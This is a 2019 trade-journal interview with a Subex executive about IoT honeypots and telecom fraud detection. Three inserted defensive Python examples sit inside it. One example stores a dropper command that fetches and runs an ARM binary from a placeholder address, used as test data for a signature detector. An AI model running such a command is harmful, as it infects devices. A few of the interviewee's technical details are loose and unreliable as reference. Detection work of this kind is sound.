Black Swan Telecom Journal
November 2019
Is achieving great business or career success just luck — being at the right place at the right time? Or can you actually do something to greatly increase your odds of coming out a winner?
Well, according to Scott Adams, the creator/cartoonist of the famous Dilbert comic (and former telecom exec at PacBell), a person can truly “manage his luck” through wise positioning:
“Let’s say your goal is to be hit by lightning. Well, people would say, ‘It’s very unusual to be hit by lightning, so it’s luck and there’s nothing you can do about it.’
But actually there are some things you can do. You could go outdoors. That would increase your odds. Better yet, you can go outdoors when it’s raining in a place that has thunderstorms.
And if that’s not enough, you could pack up your belongings, move to the top of a mountain that has frequent thunderstorms, then build a network of connected lightning rods, and camp out with your hand holding a cable attached to those rods.
For sure, you’re going to get hit by some lightning!” (Scott Adams)
Now in my line of work, as an independent telecom analyst, I find I can get more business by interviewing more experts for Black Swan stories. For me, that’s the equivalent of holding onto some lightning rods, for I can demonstrate my value to people who may need my market research services.
Likewise, Subex, a veteran analytics firm, has come up with an innovative way to position itself as an expert vendor of IoT security monitoring and protection services. I recently spoke with Kiran Zachariah, Subex’s VP of IoT Business Solutions, who explains how Subex is attracting clients as it develops a rich portfolio of security and fraud prevention solutions and services.
Dan Baker, Editor, Black Swan Telecom Journal: Kiran, let’s get right into your biggest area of focus: IoT Security. How is Subex involved and building your business there?
Kiran Zachariah: Dan, the way we build our expertise is to research IoT security problems in a very deep way. Subex now runs the world’s largest network of IoT honeypots. And those honeypots drive our analysis and research into global IoT security threats. We then use the threat intelligence we compile to protect our customers’ IoT networks from similar attacks. Today we protect a total of 10.5 million IoT devices.
Our honeypots are actually scattered across 65 locations around the world. And they sit and wait to be attacked, these days at the rate of 3.5 million attacks per day. We’ve also organized our intelligence to capture data as it relates to 400 different device architectures, with a total of about 4,000 unique devices across all our honeypots.
The biggest challenge in IoT security is keeping track of the widely diverse threats. IoT attacks are substantially different from IT attacks. For example, in the IoT world, quite a bit of the malware is open source. In all, we identify roughly 150 new strains of malware every day.
The IoT devices themselves start with simple SIP phones, sensors, routers, and go all the way up to what we call OT devices (Operational Technology) that actually sit on an industrial shop floor. Another complication: lots of IoT devices connect back to legacy infrastructure to sync with shop floor technology that hasn’t changed in 20 years. For instance, lots of the shop floors use Windows 7 and other legacy OSs.
We monitor various types of communication protocols, too. You have CoAP and AMCP. Also there are transport protocols like LoRa, Sigfox, LPWAN, and NB-IoT. And the IoT world has its own transport protocols such as Modbus, BACnet, and IEC protocols. So many to keep track of.
Now, the diversity of IoT attacks is so large and complex that it requires a dedicated effort. It’s not practical for an enterprise to get into the business of monitoring these threats. So that’s where Subex comes in. We aim to pick up almost every attack out there, analyze what we detect, and protect customers.
What sort of data are you collecting from the honeypots?
Well, the first important thing to collect is the actual malware payload that the bot is trying to download to the IoT device. We also monitor the way they do their reconnaissance from a command and control center. And we ask key questions like: how are the IP addresses of those command and control centers changing? What types of architectures are they trying to attack? What type of devices are they targeting?
Tracking the particular strain of malware is also crucial. For example, Mirai was one of the biggest, most famous IoT malware. And because Mirai was open source, people were constantly downloading Mirai, changing a few things, then recompiling and launching a new botnet with a different strain of malware.
So we get to know all of those variants and increasingly there are “smart variants” which merge multiple malware source codes to create super-smart malware.
Another important goal of our research is to detect the bit patterns or “signatures”. Because we maintain a blacklist of IP addresses, we know where each of them is coming from. Then as the bot tries to download its payload into the IoT device, we detect the bit pattern flow (or signature flow) through the pipe and stop the session in near-real-time so that the device does not get infected.
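The detection step just described, written out as an added example (this is not Subex’s code): a minimal inline inspector in Python that blocks a session when either endpoint is on a blacklist of dropper/C2 addresses, or when a known byte signature shows up in the payload being pulled down to the device, including a signature that straddles two TCP chunks. The addresses, the signatures and the session bytes are constructed for the example; the ELF signature is the real header layout of a 32-bit little-endian ARM executable (ET_EXEC, EM_ARM = 0x28).

```python
"""Inline signature/blacklist check for an IoT malware download (added example,
not Subex's code). IPs, signatures and session bytes are constructed."""
from dataclasses import dataclass

# Constructed blacklist of known dropper / C2 addresses (RFC 5737 documentation ranges).
BLACKLISTED_IPS = {"203.0.113.7", "198.51.100.23"}

# Constructed byte signatures. In practice these come from payloads captured on
# honeypots; the two here are a typical busybox dropper command line and the first
# 20 bytes of an ELF32 little-endian executable for the ARM machine type.
SIGNATURES = {
    "dropper-shell": b"cd /tmp; wget http://",
    "elf-arm-le": b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8 + b"\x02\x00\x28\x00",
}


@dataclass
class Session:
    src_ip: str
    dst_ip: str
    tail: bytes = b""       # carried-over bytes so a signature split across chunks still matches
    verdict: str = "allow"


class Inspector:
    def __init__(self, blacklist, signatures):
        self.blacklist = blacklist
        self.signatures = signatures
        # Keep len(longest signature) - 1 bytes from the previous chunk.
        self.overlap = max((len(s) for s in signatures.values()), default=1) - 1

    def inspect(self, session: Session, chunk: bytes) -> str:
        """Feed one TCP payload chunk; return the running verdict for the session."""
        if session.verdict != "allow":
            return session.verdict                 # already blocked
        if session.src_ip in self.blacklist or session.dst_ip in self.blacklist:
            session.verdict = "block:blacklisted-ip"
            return session.verdict
        window = session.tail + chunk
        for name, sig in self.signatures.items():
            if sig in window:
                # An enforcement point would reset / tear down the flow here.
                session.verdict = f"block:{name}"
                return session.verdict
        session.tail = window[-self.overlap:] if self.overlap else b""
        return session.verdict


def run_session(src_ip: str, dst_ip: str, chunks) -> str:
    """Replay a whole session through the inspector and return the final verdict."""
    inspector = Inspector(BLACKLISTED_IPS, SIGNATURES)
    session = Session(src_ip, dst_ip)
    for chunk in chunks:
        if inspector.inspect(session, chunk) != "allow":
            break
    return session.verdict


if __name__ == "__main__":
    # Constructed dropper session where the wget line straddles two chunks.
    split = [b"#!/bin/sh\ncd /tmp; wg", b"et http://198.51.100.5/arm7; chmod +x arm7; ./arm7"]
    print(run_session("192.0.2.10", "192.0.2.50", split))                              # block:dropper-shell
    print(run_session("192.0.2.10", "203.0.113.7", [b"GET /x.sh HTTP/1.0\r\n"]))       # block:blacklisted-ip
    print(run_session("192.0.2.10", "192.0.2.50", [b"POST /telemetry HTTP/1.1\r\n"]))  # allow
```

The overlap buffer is the part that matters in practice: a dropper line or ELF header rarely arrives in one segment, and an inspector that only looks at each chunk in isolation misses exactly the payloads it was built to catch.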
So how secure is IoT today? Are security threats under control or are there some potential negative black swans on the horizon?
I don’t think you can put the problem in black and white terms. Look at telecom IRSF fraud. Almost every operator accepts the fact that a certain amount of toll fraud will be successful. The point is to limit financial losses to an acceptable level.
The same goes for IoT cybersecurity. Clearly 99% of the attacks we see on the honeypots are familiar to us or are variations of past attacks. But in that 1% of new attacks we often see clever, purpose-driven malware. And that’s quite scary.
For example, an alleged Russian team named Fancy Bear successfully ran hacking attacks on printers and IoT devices to infiltrate enterprise networks.
But while Fancy Bear-like attacks get people’s attention, I don’t feel it’s holding back the IoT market. Today we see considerable investing in IoT, and people are falling back on service providers like Subex who provide that essential security.
Typically, we get involved early on in an IoT project. We become part of our customer’s whole development and deployment process. And our key role is to continually perform vulnerability assessments and penetration tests of the client’s devices.
We also do the monitoring of the whole deployment for the long-term through multiple layers of protection and monitoring methods.
While the threats are very real and break-ins still occur, enterprises that segment their network and perform basic network hygiene can successfully manage the IoT security problem. Even if your device is hacked, you can prevent a substantial attack on your old networks by making sure the attack does not spread or infiltrate to the rest of your enterprise.
In what sectors of the IoT Security market is Subex active?
In a number of areas. IoT security for the oil and gas industry is one. There we monitor and protect smart meters, the pumps, and offshore rigs, many of which have SCADA interfaces. We are doing government projects that secure smart cities.
And, of course, we do lots of work with telcos. We’ve made public announcements with Telefonica and a few other telcos about securing their IoT devices from the telco perspective. So, the telco can today secure IoT devices and charge its customers a certain price above the basic connectivity price, and monetize our solution that way.
Another key market for us is the auto industry where we are involved in connected cars and autonomous driving. And automotive is an interesting one for us because we serve two different sides of communication security: telco networks and the car-resident OEM comms buses.
So on the telco side we are preventing and monitoring network-based attacks. But there are many other networks we need to secure. For instance, Android and iOS Hyperplay directly connect to comms buses such as CAN bus, Modbus, and FlexBus to handle electronics inside the car.
Take the ABS (Automated Braking System) in a car. ABS is a safety feature that ensures when you brake on ice or snow, the tires rotate at the same speed so your car doesn’t skid off the road and go out of control. All of this is done electronically. But imagine the security and safety risks if someone could remotely control the ABS in a car. So some of our IoT deployments in the connected car space are directly helping the OEMs to secure such car-internal subsystems.
Sounds like you’re rapidly building an expertise in IoT. But I’m also reminded that Subex has a long pedigree in telecom fraud management. What’s happening on that front?
We have actually made big investments in telecom fraud in an initiative we call Digital Fraud Prevention. As you know, our prior method was to pick up technical fraud using Call Detail Records (CDRs). But our new digital solutions are a great improvement: they detect in real-time by looking at the signaling parameters in the network.
The whole idea is to look at, say, the SIP INVITE message or a spoofed CLI number on the INVITE message, and that allows us to go to the SBC and tear down the fraudulent voice call before it actually occurs.
The SIP INVITE is only one signaling type. We also look at SS7, Diameter, and other voice signaling. Our solution is built to protect voice, SMS, and data services. We’ve created new modules in SMS and on the data side, and are also working on an IPTV module. So all these will enable new fraud control capabilities for customers beyond what they could do by looking merely at CDRs.
Our Digital Fraud Prevention program is great for many types of technical fraud: CLI spoofing, IRSF, PBX hacking, Wangiri, data fraud. Collectively these are the fastest growing types of fraud in the telco network.
At one large operator, we deployed our Digital Fraud Protection and achieved a 48-hour reduction in IRSF fraud run-time for them. With Wangiri, the challenge is two-fold: the fraudster will spoof the phone number on the CLI but also vary the IP address from where the calls are being made. So, even if you try to shut it down, tomorrow they will switch to another phone number and come in through another IP address.
A top fraud problem in developing countries is something called www.0.facebook.com fraud. Facebook subsidizes all traffic to their website in developing countries. So when the user surfs to Facebook, the telco will not charge the user because Facebook bears that cost.
Well, as you can imagine, “Free Internet” is a magnet for fraudsters. What they often do is set up rogue DNS queries that enable data downloads invisible to the underlying provider and therefore never charged to Facebook. Here, Subex provides deep packet inspection on particular interfaces, such as the Gn interface, where we look for header mismatches to detect the fraud.
Kiran, when you add up your fraud and IoT security programs, you’ve created a nice virtuous circle of software and managed services work for Subex. And adding the research angle through your honeypot network is a great way to both gain expertise and win clients.
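The signalling-level check described earlier in this answer (inspecting the SIP INVITE for a spoofed CLI and tearing the call down at the SBC), as an added example in Python; this is not Subex’s code. It parses a constructed INVITE, takes the calling number from P-Asserted-Identity when present and from From otherwise, and compares it with a hypothetical per-trunk table of the number prefixes each peer is allowed to present. The trunk policy, the peer addresses and the INVITE itself are all constructed for the example.

```python
"""CLI (calling number) spoofing check on a SIP INVITE at the SBC edge (added example,
not Subex's code). The trunk policy table, addresses and INVITE are constructed."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed policy: the calling-number prefixes each signalling peer (trunk) may present.
TRUNK_POLICY = {
    "198.51.100.10": {"name": "enterprise-pbx-A", "cli_prefixes": ("+4420712",)},
    "203.0.113.40": {"name": "wholesale-carrier-B", "cli_prefixes": ("+33", "+34")},
}

# Numeric user part of a sip:/sips:/tel: URI (E.164-style digits, optional leading +).
_NUMBER_IN_URI = re.compile(r"(?:sip|sips|tel):(\+?[0-9]{3,15})")


@dataclass
class Decision:
    action: str          # "allow" or "teardown"
    reason: str
    cli: Optional[str]


def parse_sip_headers(raw: str) -> dict:
    """Parse the header block of a SIP INVITE into {lowercased name: [values]}."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not lines[0].startswith("INVITE "):
        raise ValueError("not an INVITE request")
    headers: dict = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def _first(headers: dict, *names) -> Optional[str]:
    """First value among the given header names (long and compact forms)."""
    for n in names:
        if n in headers:
            return headers[n][0]
    return None


def number_in(value: Optional[str]) -> Optional[str]:
    m = _NUMBER_IN_URI.search(value) if value else None
    return m.group(1) if m else None


def evaluate_invite(raw: str, src_ip: str) -> Decision:
    """Decide whether the SBC should let the INVITE through or tear it down."""
    headers = parse_sip_headers(raw)
    policy = TRUNK_POLICY.get(src_ip)
    if policy is None:
        return Decision("teardown", f"INVITE from unknown peer {src_ip}", None)

    from_cli = number_in(_first(headers, "from", "f"))
    pai_cli = number_in(_first(headers, "p-asserted-identity"))
    if from_cli and pai_cli and from_cli != pai_cli:
        # Display identity and network-asserted identity disagree: treat as spoofing.
        return Decision("teardown", f"From {from_cli} != P-Asserted-Identity {pai_cli}", from_cli)
    cli = pai_cli or from_cli
    if cli is None:
        return Decision("teardown", "no numeric calling number in From/P-Asserted-Identity", None)
    if not cli.startswith(policy["cli_prefixes"]):
        return Decision("teardown", f"CLI {cli} not assigned to trunk {policy['name']}", cli)
    return Decision("allow", f"CLI {cli} consistent with trunk {policy['name']}", cli)


# Constructed INVITE: wholesale carrier B presenting a UK number it is not assigned.
SPOOFED_INVITE = (
    "INVITE sip:+14155550100@sbc.example.net SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 203.0.113.40:5060;branch=z9hG4bK776asdhds\r\n"
    'From: "Your Bank" <sip:+442071234567@203.0.113.40>;tag=1928301774\r\n'
    "To: <sip:+14155550100@sbc.example.net>\r\n"
    "Call-ID: a84b4c76e66710@203.0.113.40\r\n"
    "CSeq: 314159 INVITE\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print(evaluate_invite(SPOOFED_INVITE, "203.0.113.40"))   # teardown: CLI not assigned to trunk
```

Keying the policy on what a trunk is entitled to present, rather than on a list of bad numbers, is what holds up against the Wangiri pattern described above, where the CLI and the originating IP both change from day to day: a rotated number is still one the peer was never assigned.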
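The zero-rating check in the last two paragraphs, as an added example in Python (not Subex’s code). The assumption it makes, stated here because the interview does not spell out which headers are compared: a flow seen on the Gn interface is suspect when its HTTP Host header names the zero-rated site but its destination address lies outside the prefixes the operator’s own resolvers return for that site, which is what a subscriber steered by a rogue DNS server towards a proxy looks like. The hostnames, prefixes and flow records are constructed.

```python
"""Zero-rating abuse check over constructed Gn-interface flow records (added example,
not Subex's code). Assumption: Host header says zero-rated service, destination IP
does not belong to it -> suspect (rogue DNS / proxy). Prefixes and flows are constructed."""
import ipaddress
from dataclasses import dataclass

# Constructed: zero-rated hostnames and the prefixes the operator's own resolvers return for them.
ZERO_RATED = {
    "0.facebook.com": ["203.0.113.0/25", "2001:db8:face::/48"],
}
ZERO_RATED_NETS = {
    host: [ipaddress.ip_network(p) for p in prefixes] for host, prefixes in ZERO_RATED.items()
}


@dataclass
class FlowRecord:
    subscriber: str   # MSISDN or IMSI taken from the GTP tunnel context
    dst_ip: str
    host: str         # HTTP Host header as seen by DPI
    dl_bytes: int


def classify(flow: FlowRecord) -> str:
    """'zero-rated', 'billable', or 'suspect' (claims a zero-rated host but goes elsewhere)."""
    nets = ZERO_RATED_NETS.get(flow.host.lower())
    if nets is None:
        return "billable"
    dst = ipaddress.ip_address(flow.dst_ip)
    if any(dst in n for n in nets):      # version mismatch simply yields False
        return "zero-rated"
    return "suspect"


def audit(flows) -> dict:
    """Bytes carried on suspect flows per subscriber, for rating normally or investigating."""
    totals: dict = {}
    for f in flows:
        if classify(f) == "suspect":
            totals[f.subscriber] = totals.get(f.subscriber, 0) + f.dl_bytes
    return totals


# Constructed flow records (RFC 5737 / RFC 3849 documentation addresses).
SAMPLE_FLOWS = [
    FlowRecord("sub-1", "203.0.113.20", "0.facebook.com", 40_000),        # genuine zero-rated
    FlowRecord("sub-2", "198.51.100.77", "0.facebook.com", 900_000_000),  # rogue DNS -> proxy
    FlowRecord("sub-2", "198.51.100.77", "0.Facebook.com", 350_000_000),  # same, mixed-case Host
    FlowRecord("sub-3", "192.0.2.8", "video.example.net", 12_000),        # ordinary billable
]

if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        print(f.subscriber, f.dst_ip, f.host, classify(f))
    print(audit(SAMPLE_FLOWS))   # {'sub-2': 1250000000}
```

The same comparison works for the TLS SNI instead of the Host header once the traffic is encrypted; what does not work is trusting the hostname on its own, since the hostname is exactly the field the fraudster controls.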
Thanks, Dan. The other thing we like is we’re creating research assets and expertise that are cross-industry. In IoT security, we can not only serve telecom, but also steadily increase our ability to serve enterprises in other industries, too.
And it’s not a one-way street either. The expertise tends to loop back around and benefit the telcos. What we do is take the use cases we’ve developed in very specific IoT scenarios and enable the telcos to bundle that expertise and resell it with their connectivity to serve enterprise customers. Quite a few of them are doing that today.
Copyright 2019 Black Swan Telecom Journal